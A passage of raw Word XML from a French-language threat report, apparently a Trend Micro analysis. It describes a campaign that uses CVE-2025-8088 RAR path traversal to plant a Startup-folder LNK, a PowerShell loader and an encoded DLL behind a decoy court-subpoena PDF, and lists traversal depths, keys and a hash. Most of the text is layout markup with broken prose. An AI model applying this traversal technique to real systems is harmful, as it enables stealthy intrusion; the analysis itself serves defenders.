                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="4403089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4514850" y="4403089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="451485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787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889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9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3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En février 2026, SHADOW-EARTH-066 était passé des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droppers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 de macros Excel à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0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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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vulnérabilité CVE-2025-8088 comme vecteur d’accès initial, et des charges utiles .NET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1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5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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intégrées avec exfiltration via Telegram à une chaîne de chargement de DLL en mémoire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2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1480843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3273104" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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31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avec des serveurs de commande et contrôle dédiés.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4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1877488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3312799" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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799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3.2. Au cœur de la chaîne d’attaque CVE-2025-8088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5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2188233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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L’artefact de compilation le plus récent, daté du 9 avril 2026, indique que la campagne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6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2372383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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restée active au moins jusqu’au début du mois d’avril (la chaîne d’attaque complète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7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2556533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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illustrée à la figure 3). Les archives RAR spécialement conçues contiennent un fichier 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8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2740683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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factice visible ainsi que trois charges utiles ADS cachées qui utilisent le traversement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79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2924833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4258129" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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81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chemin pour écrire des fichiers en dehors du répertoire d’extraction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0160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3213323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5506427" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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42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"/>
                          </w:rPr>
                          <w:t xml:space="preserve">5 niveaux plus haut : un fichier de raccourci LNK ciblant</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="14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%APPDATA%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1184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3428588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3983100" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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310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\Microsoft\Windows\Start Menu\Programs\Startup\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220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3643853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5507760" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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77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12 niveaux plus haut : un script de chargement Powershell déposé dans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3232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3859118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1156853" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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68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\ProgramData\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425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4074383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5507760" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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776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12 niveaux plus haut : une charge utile DLL encodée déposée dans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528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4289648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1199895" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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989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\ProgramData\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6304" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>956944</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9262765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5683917" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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391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23 – Chaîne d'attaque allant de l'exploitation de la vulnérabilité CVE-2025-8088 à l'exfiltration via HTTPS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732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7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835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7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93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7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9040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7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9142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7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992448" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>842644</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7708274</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="347980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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5019" cy="3479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5019" h="347980">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="347980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="34798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21120" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>843280</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7708909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="347345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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4384" cy="3473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4384" h="347345">
                          <a:moveTo>
                            <a:pt x="3174" y="34734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347345"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="347345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="34734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  <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5874384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2521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1181109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609599" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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9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9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608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60959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29312" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5358129</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1790709</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1263650" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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365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365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263015" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1263015" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="126365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1360" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2292985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3357889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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3408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3357889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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7504" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2903854</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5173989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280673" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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67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067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280670" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28067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9552" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5248275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5173989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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1840" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3094989</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5173989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2999740" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9740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9740" h="414020">
                          <a:moveTo>
                            <a:pt x="2999105" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2999105" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1817370" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2999740" y="215264"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="577215" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="577215" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="940435" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="940435" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="576580" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="941070" y="215264"/>
                          </a:lnTo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281305" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281305" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281939" y="215264"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="889635" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="88963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3888" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4912995</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5388619</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7984" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1409700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7212339</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609600" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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0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608965" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608965" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60960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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3900170</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7212339</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609599" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9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9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608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60959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6176" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1145540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8313429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1182369" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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36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2369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181735" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1181735" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="118236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71296" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1427480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8313429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3402330" cy="216538"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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2330" cy="2165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02330" h="216535">
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1968499" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2220595" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2220595" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3401694" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3401694" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2219960" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340233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72320" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3395345</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8529329</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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80512" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1428115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8529329</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4242435" cy="629919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2435" cy="62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42435" h="629919">
                          <a:moveTo>
                            <a:pt x="4241799" y="430530"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4241799" y="629919"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2978785" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4242435" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="599440" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="599440" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2207260" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2207260" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="598805" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2207895" y="215264"/>
                          </a:lnTo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82560" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4407535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8959859</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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866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9174489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1427479" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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747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747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426845" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1426845" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="142747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94848" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5378449</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9174489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1244600" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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460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44600" h="199389">
                          <a:moveTo>
                            <a:pt x="1044574" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1044574" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1243964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1243964" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1043940" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1244600" y="634"/>
                          </a:lnTo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936625" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="936625" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="93726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30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9390389</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="946149" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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614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6149" h="199389">
                          <a:moveTo>
                            <a:pt x="582294" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="582294" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="945515" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="945515" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="581659" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="946149" y="63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281304" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281304" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28193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406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7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508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7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6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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Ces niveaux de profondeur sont calculés pour atteindre l'arborescence du répertoire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713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1166718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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AppData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 de l'utilisateur à partir d'un client de messagerie classique utilisant un chemin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8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1374163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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d'extraction temporaire. Le fichier LNK est placé dans le dossier </w:t>
                        </w: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Startup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afin qu'il s'exécute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9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1570378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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lors de la prochaine connexion de l'utilisateur, déclenchant ainsi la chaîne de charge utile.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0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1776318</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Douze niveaux de traversée mènent à la racine du disque, atteignant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C:\ProgramData\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1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1983763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Du point de vue de la victime, celle-ci extrait l’archive et voit s’afficher un document PDF.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2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2167913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Aucun avertissement n’est affiché, car les fichiers supplémentaires sont écrits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3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2352063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2022650" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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26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silencieusement en arrière-plan.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4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2625113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Trend Micro a analysé plusieurs échantillons RAR issus de différents groupes de versions.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5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2798468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Bien que les noms de fichiers, les clés d’encodage et les adresses C2 diffèrent d’une version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6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2971823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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à l’autre, toutes partagent des empreintes structurelles communes : le nom d’exportation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7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3142245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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la DLL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  <w:u w:val="single" w:color="000000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 a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vec une seule fonction d’exportation, le décalage PE non standard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840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3343498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5816483" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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4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3"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">e_lfanew = 0x110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, la bibliothèque </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="-5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">libcurl 8.14.0-DEV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liée statiquement, des clés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9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3540148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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d’exfiltration RC4 identiques, ainsi que le même SID de la machine de compilation intégré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0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3713503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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tous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LNK.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échantillon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(SHA256</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="18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4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1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3883925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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3d371ef71e40c34a75c168d4647db096c2f386499d99a88d4e16b63cd4acda25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 est examiné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2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4066563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="742020" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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20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ci-dessous.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3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4341518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Cette archive RAR dépose un fichier PDF contenant une citation à comparaître émanant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4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4514873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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tribunal administratif régional de Dnipropetrovsk, servant de leurre. Les trois charges utiles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5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4688228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2108006" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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80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ADS cachées sont les suivantes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659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4960250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4656795" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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679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 fichier LNK (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bfF3Bxte</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="12"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">abX</w:t>
                        </w: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qg.lnk</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="-3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">) plac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é dans le dossier Dé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marrage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761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5158963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2849559" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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955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 chargeur Powershell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KKN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 placé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8640" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4003675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5158963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1363725" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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372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C:\ProgramData\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966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5375933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1960736" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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073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5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5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DLL encodée en "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sub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" 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0688" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3691255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5374228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1258313" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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831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0x38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 placée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1712" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4932045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5374228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1277465" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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746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C:\ProgramData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2736" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3114675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5374228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="594128" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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12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ND8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clé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3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5662953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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D’autres échantillons utilisent différents thèmes de leurre, notamment un registre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4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5836308</wp:posOffset>
            </wp:positionV>
